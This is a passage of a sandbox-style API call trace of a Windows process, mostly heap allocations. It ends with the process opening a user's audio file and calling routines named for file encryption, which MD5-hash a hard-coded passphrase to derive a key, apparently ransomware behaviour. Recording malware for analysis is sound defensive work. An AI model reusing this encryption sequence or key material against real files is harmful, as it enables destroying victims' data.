0x43ca4f0 [0115.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0115.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0115.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0115.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0115.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0115.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0115.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0115.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0115.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0115.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0115.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0115.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0115.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0115.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0115.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0115.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0115.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391af0 [0115.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0115.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0115.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0115.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0115.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0115.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0115.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0115.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0115.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0115.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0115.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0115.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0115.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0115.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0115.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0115.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0115.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0115.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0115.415] PeekMessageW (in: lpMsg=0x144e74c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e74c) returned 0 [0115.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0115.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0115.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0115.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0115.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0115.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0115.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0115.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0115.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0115.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0115.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0115.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0115.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0115.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0115.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0115.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0115.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0115.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0115.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0115.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0115.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0115.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0115.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0115.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0115.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0115.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0115.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0115.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0115.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0115.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0115.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0115.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0115.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0115.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0115.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0115.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0115.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0115.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0115.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0115.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0115.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0115.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0115.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0115.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0115.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0115.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0115.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0115.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0115.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0115.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0115.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0115.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0115.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0115.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0115.417] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0115.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0115.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0115.417] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0115.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0115.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0115.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0115.417] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0115.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0115.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0115.417] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0115.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0115.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0115.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0115.417] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0115.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a4fa8 [0115.417] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0115.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0115.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0115.417] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0115.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0115.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0115.417] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0115.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0115.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0115.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0115.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0115.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0115.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0115.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0115.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0115.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0115.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0115.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0115.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0115.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0115.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0115.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0115.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0115.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0115.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0115.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0115.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0115.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0115.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0115.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0115.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0115.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0115.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0115.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0115.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0115.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0115.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0115.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0115.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0115.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0115.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0115.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0115.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0115.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0115.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0115.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0115.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0115.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0115.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0115.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0115.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0115.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0115.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0115.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0115.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0115.419] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0115.419] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43caa78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0115.420] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\g4kPqWyZSQA5pz.wav" (normalized: "c:\\users\\fd1hvy\\music\\rjvhkidt9\\evi6nl1 g1kyy\\g4kpqwyzsqa5pz.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298 [0115.420] FreeLibrary (hLibModule=0x772d0000) returned 1 [0115.420] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0115.420] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0115.420] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca760, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0115.420] CloseHandle (hObject=0x298) returned 1 [0115.420] FreeLibrary (hLibModule=0x772d0000) returned 1 [0115.420] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0115.420] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\g4kPqWyZSQA5pz.wav", lpFindFileData=0x144e878 | out: lpFindFileData=0x144e878*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2dee1750, ftCreationTime.dwHighDateTime=0x1d5e7db, ftLastAccessTime.dwLowDateTime=0x8f87cd00, ftLastAccessTime.dwHighDateTime=0x1d5ef0e, ftLastWriteTime.dwLowDateTime=0x8f87cd00, ftLastWriteTime.dwHighDateTime=0x1d5ef0e, nFileSizeHigh=0x0, nFileSizeLow=0x13ad5, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="g4kPqWyZSQA5pz.wav", cAlternateFileName="G4KPQW~1.WAV")) returned 0x41ac280 [0115.420] FindClose (in: hFindFile=0x41ac280 | out: hFindFile=0x41ac280) returned 1 [0115.420] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0115.420] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0115.421] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0115.421] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0115.421] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0115.421] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0115.421] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796ea8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0115.421] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0115.421] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1797128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0115.421] CryptAcquireContextA (in: phProv=0x144e558, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e558*=0x41a48c0) returned 1 [0115.422] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0115.422] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0115.422] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0115.422] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0115.422] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0115.422] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0115.422] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0115.422] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0115.422] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0115.422] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0115.422] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43cacd0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0115.422] CryptCreateHash (in: hProv=0x41a48c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e2c8 | out: phHash=0x144e2c8) returned 1 [0115.422] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0115.422] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2728, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0115.422] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0115.422] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0115.422] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2728, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0115.422] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0115.422] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0115.422] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0115.423] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43cad00, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0115.423] CryptHashData (hHash=0x41ac180, pbData=0x17e2848, dwDataLen=0x22, dwFlags=0x1) returned 1 [0115.423] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0115.423] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0115.423] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0115.423] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0115.423] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", 